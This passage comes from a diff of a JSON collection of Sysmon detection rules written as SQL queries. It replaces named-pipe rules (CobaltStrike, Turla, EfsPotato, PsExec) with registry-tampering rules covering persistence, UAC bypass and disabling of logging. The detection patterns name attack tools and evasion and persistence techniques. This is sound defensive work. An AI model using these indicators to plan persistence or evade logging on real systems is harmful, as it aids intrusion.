(see references)", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Valid Macros and/or internal documents" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" ], - "filename": "pipe_created_koh_default_pipe.yml" + "filename": "registry_set_office_security.yml" }, { - "title": "ADFS Database Named Pipe Connection", - "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "status": "test", - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Set TimeProviders DllName", + "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "status": "experimental", + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.persistence", + 
"attack.privilege_escalation", + "attack.t1547.003" ], "falsepositives": [ - "Processes in the filter condition" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR Image LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR Image LIKE '%\\\\tssdis.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" ], - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" + "filename": "registry_set_timeproviders_dllname.yml" }, { - "title": "EfsPotato Named Pipe", - "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "title": "NET NGenAssemblyUsageLog Registry Key Tamper", + "id": "28036918-04d3-423d-91c0-55ecf99fb892", "status": "experimental", - "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. 
fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" ], - "filename": "pipe_created_efspotato_namedpipe.yml" + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" }, { - "title": "CobaltStrike Named Pipe Patterns", - "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", + "title": "Enabling COR Profiler Environment Variables", + "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", "status": "test", - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1574.012" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + ], 
+ "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + }, + { + "title": "Potential Attachment Manager Settings Attachments Tamper", + "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "status": "experimental", + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" ], "falsepositives": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName 
LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND Details = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" ], - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" + "filename": "registry_set_policies_attachments_tamper.yml" }, { - "title": "PsExec Tool Execution From Suspicious Locations - PipeName", - "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "title": "Potential Persistence Via DLLPathOverride", + "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "status": "experimental", - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. 
Which could indicate that the tool is being used in an attack", + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.persistence" ], "falsepositives": [ - "Rare legitimate use of psexec from the locations mentioned above" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" ], - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" + "filename": "registry_set_persistence_natural_language.yml" }, { - "title": "DiagTrackEoP Default Named Pipe", - "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "title": "Disable Sysmon Event Logging Via Registry", + "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", "status": "experimental", - "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes in 
Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "author": "B.Talebi", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate driver altitude change to hide sysmon" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '%thisispipe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" ], - "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + "filename": "registry_set_change_sysmon_driver_altitude.yml" }, { - "title": "Turla Group Named Pipes", - "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "title": "Winlogon Notify Key Logon Persistence", + "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", "status": "test", - "description": "Detects a named pipe used by Turla group samples", - "author": "Markus Neis", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "author": "frack113", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1106" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' 
ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "pipe_created_apt_turla_namedpipes.yml" + "filename": "registry_set_winlogon_notify_key.yml" }, { - "title": "CobaltStrike Named Pipe Pattern Regex", - "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", + "title": "Execution DLL of Choice Using WAB.EXE", + "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", "status": "test", - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "author": "Florian Roth (Nextron Systems)", + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. 
Launched WAB.exe tries to load the DLL from Registry.", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (Details LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" ], - "filename": "pipe_created_mal_cobaltstrike_re.yml" + "filename": "registry_set_wab_dllpath_reg_change.yml" }, { - "title": "WMI Event Consumer Created Named Pipe", - "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "status": "test", - "description": "Detects the WMI Event Consumer service scrcons.exe creating a 
named pipe", - "author": "Florian Roth (Nextron Systems)", + "title": "Persistence Via Hhctrl.ocx", + "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "status": "experimental", + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1047", - "attack.execution" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" ], - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" + "filename": "registry_set_hhctrl_persistence.yml" }, { - "title": "CobaltStrike Named Pipe", - "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", + "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", "status": "test", - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' 
ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND Details LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" ], - "filename": "pipe_created_mal_cobaltstrike.yml" + "filename": "registry_set_uac_bypass_winsat.yml" }, { - "title": "Suspicious Network Connection Binary No CommandLine", - "id": "20384606-a124-4fec-acbb-8bd373728613", - "status": "experimental", - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", + "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND Details IN ('0', 'DWORD (0x00000000)'))))" ], - "filename": "net_connection_win_susp_binary_no_cmdline.yml" + "filename": "registry_set_dot_net_etw_tamper.yml" }, { - "title": "Remote PowerShell Session (Network)", - "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "status": "test", - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Adwind RAT / JRAT - Registry", + "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "status": "experimental", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1059.005", + "attack.t1059.007" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND Details LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + ], + "filename": "registry_set_mal_adwind.yml" 
+ }, + { + "title": "RDP Sensitive Settings Changed", + "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "status": "test", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", - "Network Service user name of a not-covered localization" + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND Details IN ('DWORD 
(0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_remote_powershell_session_network.yml" + "filename": "registry_set_terminal_server_tampering.yml" }, { - "title": "Download a File with IMEWDBLD.exe", - "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "title": "New File Association Using Exefile", + "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", "status": "test", - "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", - "author": "frack113", + "description": "Detects the abuse of the exefile handler in new file association. 
Used for bypass of security products.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND Details = 'exefile' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_imewdbld.yml" + "filename": "registry_set_file_association_exefile.yml" }, { - "title": "Cmstp Making Network Connection", - "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", - "status": "experimental", - "description": "Detects suspicious network connection by Cmstp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via GlobalFlags", + "id": "36803969-5421-41ec-b92f-8500f79c23b0", + "status": "test", + "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", "tags": [ + "attack.privilege_escalation", + "attack.persistence", "attack.defense_evasion", - "attack.t1218.003" + "attack.t1546.012", + "car.2013-01-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE 
